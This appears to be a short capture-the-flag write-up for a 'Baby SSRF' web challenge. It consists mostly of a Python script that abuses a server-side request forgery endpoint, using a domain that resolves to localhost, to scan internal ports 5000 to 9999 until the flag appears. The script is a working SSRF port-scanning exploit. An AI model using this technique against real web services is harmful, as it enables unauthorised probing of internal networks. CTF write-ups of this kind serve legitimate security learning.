Web - Baby SSRF
Exploit
#! /usr/bin/python3
import requests
url = "http://web.zh3r0.cf:1111/request"
payloadURL = "http://lvh.me" # Redirects to localhost
req = requests.session()
for port in range(5000,10000):
data = {"url" : payloadURL + ":{}".format(str(port))}
print("[+] Trying Port {}".format(str(port)))
r = req.post(url, data)
if "zh3r0" in r.text:
print(r.text)
breakFlag
Last updated